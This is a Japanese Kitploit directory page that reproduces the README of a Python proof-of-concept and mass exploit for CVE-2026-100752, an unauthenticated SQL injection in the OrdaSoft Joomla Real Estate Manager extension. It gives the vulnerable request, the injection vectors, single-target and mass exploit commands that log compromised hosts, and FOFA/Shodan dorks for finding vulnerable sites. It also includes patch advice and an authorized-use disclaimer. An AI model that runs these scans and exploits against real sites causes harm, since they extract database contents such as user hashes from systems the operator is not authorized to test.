Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-100752 — CVE-2026-100752 の Python 3 PoC および一括エクスプロイト。OrdaSoft Joomla Real Estate Manager <=6.7.8 における、order_field ORDER BY パラメータを介した未認証 SQL インジェクションです。 | Kitploit
ツール/GitHubGitHub/murrez/cve-2026-100752
偵察脆弱性スキャナー脆弱性分析エクスプロイトスクリプトと自動化ウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubmurrez/cve-2026-100752

CVE-2026-100752

CVE-2026-100752 の Python 3 PoC および一括エクスプロイト。OrdaSoft Joomla Real Estate Manager <=6.7.8 における、order_field ORDER BY パラメータを介した未認証 SQL インジェクションです。

4日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) 認証不要の SQL インジェクション

CVE-2026-100752 の Python 3 PoC — OrdaSoft Real Estate Manager (Free) Joomla 拡張機能 ≤ 6.7.8。6.7.9+ で修正済み。

PoCbithttps://pocbit.org/pocs/cve-2026-100752
カタログhttps://pocbit.org/pocs/
コンポーネントcom_realestatemanager
ファイルsite/realestatemanager.php
パラメータorder_field → ORDER BY (クォートなし、許可リストなし)
認証不要 (公開リスト / 検索 / カテゴリ表示)
CWECWE-89 SQL インジェクション
その他レガシー order_direction POST インジェクション (Metasploit / 6.7.9 以前の監査)

PoC 出力 (スクリーンショット)

カラフルな PoCbit バナー、続いて --mode exploit の JSON 出力: exploited: true、ベクター order_field_get、ルート showCategory + com_realestatemanager。

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

コマンド例:

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(スクリーンショットは許可されたテスト環境から取得されたものです。ターゲット URL は PoC 検証用です。)


脆弱性の概要 (トルコ語)

Real Estate Manager (Free) は、Joomla 上で不動産物件管理を行う OrdaSoft の拡張機能です。6.7.8 以前のバージョンでは、order_field リクエストパラメータが site/realestatemanager.php 内の ORDER BY 句に直接追加されます。カラム名の許可リスト、エスケープ、キャストはありません。認証なしでカテゴリ閲覧、検索結果、全物件リストのクエリが悪用可能です。

SQLi が成功すると、データベースからの読み取り (バージョン、ユーザーハッシュ、サイトデータ)、権限に応じた書き込み/削除、および連鎖的な RCE のリスクを評価する必要があります。6.7.9 以降にアップグレードしてください (OrdaSoft セキュリティリリース)。


技術的メカニズム

Joomla フロントコントローラ:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752: order_field が ORDER BY のカラム/式を制御します。値はバインディングや検証なしで SQL に連結されるため、エラーベースのサブクエリなどを注入できます。

影響を受けるクエリコンテキスト (CVE テキストより):

  1. カテゴリ閲覧 (showCategory および関連)
  2. 検索結果
  3. 全物件リスト

この PoC:

  • com_realestatemanager のフィンガープリント (パス + オプションのマニフェストバージョン)
  • サイト HTML から catid / Itemid をスクレイピング
  • タスクのプローブ: showCategory、showSearch、showSearchResult、showRent、showBuy
  • プライマリ: order_field エラーベースの GET および POST
  • フォールバック: order_direction=asc,<injection> (歴史的なベクター、一部のビルドでは依然有効)
  • Check + mass check → hits.txt
  • Exploit + mass exploit → exploited.txt (SELECT リークに成功した行)

要件

cd CVE-2026-100752
pip install -r requirements.txt

使用方法

単一ターゲット — check

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

--aggressive は boolean/エラー証明が不確定な場合に SELECT VERSION() を試行します。

単一ターゲット — exploit

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

一括処理

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
フラグ役割
--mode exploitエラーベースのデータ抽出 (一括対応)
--subqueryCONCAT(0x7e, …) ダブルクエリペイロード用の内部 SQL
--vectororder_field_get、order_field_post、または order_direction_post を強制
-j並列ターゲット数
--no-colorプレーンターミナル

JSONL には pocbit、pocbit_catalog、pocbit_page、cve、component が含まれます。


FOFA / アセット検出 dorks

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

Shodan 形式 (対応している場合): http.html:com_realestatemanager

ホスト名を targets.txt にエクスポートし (1 行に 1 URL)、許可された物件のみに対して check → hits → exploit を実行してください。


バージョン検出

マニフェスト (公開されている場合):

  • /administrator/components/com_realestatemanager/realestatemanager.xml

バージョンが ≤ 6.7.8 の場合 → likely_vulnerable_version。≥ 6.7.9 の場合 → patched_version (exploit は依然失敗する可能性があります)。


関連 CVE (同じリリース系列)

CVE種類修正
CVE-2026-100752認証不要 SQLi (order_field)6.7.9
CVE-2026-100753反射型 XSS (公開物件表示)6.7.9

同じベンダーのバッチ (2026年9月): Vehicle Manager およびその他の OrdaSoft 拡張機能にも個別の CVE が割り当てられています — 実行しているすべての OrdaSoft コンポーネントにパッチを適用してください。


参考資料

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — six flaws in three OrdaSoft extensions (2026年9月)
  • Metasploit: auxiliary/gather/joomla_com_realestatemanager_sqli (レガシー order_direction POST)

法的注意

許可されたセキュリティテストおよびパッチ検証のみ。許可なくシステムに対して使用しないでください。


GitHub リポジトリの説明

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
ツールをダウンロード